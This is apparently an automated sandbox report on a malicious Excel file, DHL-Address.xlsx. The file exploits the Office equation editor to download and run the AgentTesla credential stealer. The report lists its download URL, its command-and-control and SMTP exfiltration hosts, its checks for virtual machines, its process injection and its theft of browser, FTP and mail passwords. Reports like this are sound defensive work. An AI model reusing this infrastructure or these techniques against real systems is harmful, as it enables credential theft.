              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
              Source: vbc.exe, 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
              Source: C:\Users\Public\vbc.exeWindow created: window name: CLIPBRDWNDCLASS

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: document is protected 16 17 " t9 19 20 21 Open the doCument In If this document was 22 Micros
Source: Screenshot number: 4 | Screenshot OCR: protected documents the yellow bar above 25 26 27 28 29 30 31 0 0 32 33 0 0 34 35 0 0
.NET source code contains very large array initializations
Source: 5.2.vbc.exe.400000.1.unpack, <PrivateImplementationDetails>{49EBC49D-B1B3-4ED6-A41A-329378617F94}/1A3AC0E6-0D4C-475F-B7A0-A416DBBA91DC.cs | Large array initialization: .cctor: array initializer size 11960
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Code function: 4_2_001D22C2
Source: C:\Users\Public\vbc.exe | Code function: 4_2_001D2A98
Source: C:\Users\Public\vbc.exe | Code function: 4_2_001D75B8
Source: C:\Users\Public\vbc.exe | Code function: 4_2_001D75C8
Source: C:\Users\Public\vbc.exe | Code function: 4_2_001D2737
Source: C:\Users\Public\vbc.exe | Code function: 4_2_001D2748
Source: C:\Users\Public\vbc.exe | Code function: 4_2_001DD818
Source: C:\Users\Public\vbc.exe | Code function: 4_2_001D2A88
Source: C:\Users\Public\vbc.exe | Code function: 5_2_002D60A8
Source: C:\Users\Public\vbc.exe | Code function: 5_2_002D5490
Source: C:\Users\Public\vbc.exe | Code function: 5_2_002DDA90
Source: C:\Users\Public\vbc.exe | Code function: 5_2_002D21E7
Source: C:\Users\Public\vbc.exe | Code function: 5_2_002D57D8
Source: C:\Users\Public\vbc.exe | Code function: 5_2_002DF808
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0058F0D8
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0058CB60
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00583F30
Source: C:\Users\Public\vbc.exe | Code function: 5_2_005873F0
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0058B848
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0058A020
Source: C:\Users\Public\vbc.exe | Code function: 5_2_005826B8
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00587B00
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00581B38
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0058A790
Source: 5.2.vbc.exe.400000.1.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/10@5/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$DHL-Address.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE723.tmp
Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\vbc.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: DHL-Address.xlsx | Virustotal: Detection: 47%
Source: DHL-Address.xlsx | ReversingLabs: Detection: 48%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: DHL-Address.xlsx | Initial sample: OLE zip file path = xl/media/image2.emf
Source: DHL-Address.xlsx | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: DHL-Address.xlsx | Initial sample: OLE zip file path = xl/drawings/_rels/vmlDrawing2.vml.rels
Source: DHL-Address.xlsx | Initial sample: OLE zip file path = xl/drawings/vmlDrawing2.vml
Source: DHL-Address.xlsx | Initial sample: OLE zip file path = xl/embeddings/oleObject1.bin
Source: DHL-Address.xlsx | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: DHL-Address.xlsx | Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

.NET source code contains potential unpacker
Source: vbc[1].exe.2.dr, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.1030000.2.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.1030000.0.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.1030000.0.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.vbc.exe.1030000.4.unpack, LoaderInformation.cs | .Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\Public\vbc.exe | Code function: 5_2_005816C2 push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00582290 push esp; retf 002Ch
Source: C:\Users\Public\vbc.exe | Code function: 5_2_005803B5 push FFFFFFE8h; ret
Source: initial sample | Static PE information: section name: .text entropy: 7.3067407255
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
Source: DHL-Address.xlsx | Stream path '\x1oLe10NatIve' entropy: 7.99509276826 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match | File source: 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe | Window / User API: threadDelayed 9602
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2296 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2880 | Thread sleep time: -49517s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2868 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 3028 | Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2244 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2244 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2240 | Thread sleep count: 9602 > 30
Source: C:\Users\Public\vbc.exe TID: 2240 | Thread sleep count: 138 > 30
Source: C:\Users\Public\vbc.exe TID: 2244 | Thread sleep count: 95 > 30
Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: vbc.exe, 00000005.00000002.2360311153.0000000001110000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2360311153.0000000001110000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2360311153.0000000001110000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 552, type: MEMORY
Source: Yara match | File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to harvest and steal ftp login credentials
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Mail credentials (via file access)
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 552, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | File source: 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 552, type: MEMORY
Source: Yara match | File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | Path Interception | Process Injection 112 | Disable or Modify Tools 11 | OS Credential Dumping 2 | File and Directory Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 1 | Credentials in Registry 1 | System Information Discovery 114 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 31 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 11 | NTDS | Security Software Discovery 211 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 111 | LSA Secrets | Virtualization/Sandbox Evasion 13 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 132 | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 13 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 112 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 339078
Sample: DHL-Address.xlsx
Start date: 13/01/2021
Architecture: WINDOWS
Score: 100

Sample-level signatures: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 17 other signatures.

Process tree (recovered from the graph; bracketed digits are the node badges shown in the original rendering):

• EXCEL.EXE [37 13] (started)
  • dropped: C:\Users\user\Desktop\~$DHL-Address.xlsx (data)
• EQNEDT32.EXE [12] (started)
  • contacts: globuserinessserverfiletransferprotocol.mangospot.net 192.210.214.178, 49165, 80 (AS-COLOCROSSINGUS, United States)
  • dropped: C:\Users\user\AppData\Local\...\vbc[1].exe (PE32)
  • dropped: C:\Users\Public\vbc.exe (PE32)
  • signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  • vbc.exe (started by EQNEDT32.EXE)
    • signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Injects a PE file into a foreign processes
    • vbc.exe [4] (started by vbc.exe)
      • contacts: smtp.privateemail.com 199.193.7.228, 49166, 49168, 587 (NAMECHEAP-NETUS, United States)
      • signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

Screenshots

(Screenshot thumbnails of the Windows analysis run are not reproduced here.)

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

Source | Detection | Scanner | Label
DHL-Address.xlsx | 48% | Virustotal |
DHL-Address.xlsx | 49% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882
DHL-Address.xlsx | 100% | Joe Sandbox ML |

              Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML |

              Unpacked PE Files

Source | Detection | Scanner | Label
5.2.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1138205

              Domains

Source | Detection | Scanner | Label
globuserinessserverfiletransferprotocol.mangospot.net | 4% | Virustotal |

              URLs

Source | Detection | Scanner | Label
(Where the original table repeats an identical row once per URL-reputation engine, the row is listed once with the repeat count.)
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | 0% | URL Reputation (4x) | safe
http://www.a-cert.at0E | 0% | URL Reputation (4x) | safe
http://www.e-me.lv/repository0 | 0% | URL Reputation (4x) | safe
http://www.acabogacia.org/doc0 | 0% | URL Reputation (4x) | safe
http://crl.chambersign.org/chambersroot.crl0 | 0% | URL Reputation (4x) | safe
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0 | 0% | URL Reputation (4x) | safe
http://www.certifikat.dk/repository0 | 0% | URL Reputation (4x) | safe
http://www.chambersign.org1 | 0% | URL Reputation (4x) | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation (4x) | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation (4x) | safe
http://www.pkioverheid.nl/policies/root-policy0 | 0% | URL Reputation (4x) | safe
http://crl.ssc.lt/root-c/cacrl.crl0 | 0% | URL Reputation (4x) | safe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0 | 0% | URL Reputation (4x) | safe
http://ca.disig.sk/ca/crl/ca_disig.crl0 | 0% | URL Reputation (4x) | safe
http://www.certplus.com/CRL/class3P.crl0 | 0% | URL Reputation (4x) | safe
http://repository.infonotary.com/cps/qcps.html0$ | 0% | URL Reputation (4x) | safe
http://www.post.trust.ie/reposit/cps.html0 | 0% | URL Reputation (4x) | safe
http://www.certplus.com/CRL/class2.crl0 | 0% | URL Reputation (4x) | safe
http://www.disig.sk/ca/crl/ca_disig.crl0 | 0% | URL Reputation (4x) | safe
http://ocsp.infonotary.com/responder.cgi0V | 0% | URL Reputation (4x) | safe
http://www.sk.ee/cps/0 | 0% | URL Reputation (4x) | safe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E | 0% | URL Reputation (4x) | safe
https://api.ipify.org% | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation (4x) | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
http://www.ssc.lt/cps03 | 0% | URL Reputation (4x) | safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | 0% | URL Reputation | safe

              Domains and IPs

              Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
globuserinessserverfiletransferprotocol.mangospot.net | 192.210.214.178 | true | true | | unknown
smtp.privateemail.com | 199.193.7.228 | true | false | | high

                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://globuserinessserverfiletransferprotocol.mangospot.net/csrss/vbc.exe | true | Avira URL Cloud: malware | unknown
https://jUxNbkiTmoSYxyvoDh.net | true | Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
(Where the original table repeats an identical detection entry once per URL-reputation engine, it is listed once with the repeat count.)
http://127.0.0.1:HTTP/1.1 | vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.a-cert.at0E | vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.e-me.lv/repository0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.acabogacia.org/doc0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://crl.chambersign.org/chambersroot.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0 | vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.certifikat.dk/repository0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.chambersign.org1 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp; vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.diginotar.nl/cps/pkioverheid0 | vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.pkioverheid.nl/policies/root-policy0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://crl.ssc.lt/root-c/cacrl.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.certplus.com/CRL/class3P.crl0 | vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://repository.infonotary.com/cps/qcps.html0$ | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.post.trust.ie/reposit/cps.html0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.certplus.com/CRL/class2.crl0 | vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.disig.sk/ca/crl/ca_disig.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://ocsp.infonotary.com/responder.cgi0V | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.sk.ee/cps/0 | vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
https://api.ipify.org% | vbc.exe, 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | vbc.exe, 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp; vbc.exe, 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://servername/isapibackend.dll | vbc.exe, 00000005.00000002.2363028590.0000000006E50000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.ssc.lt/cps03 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
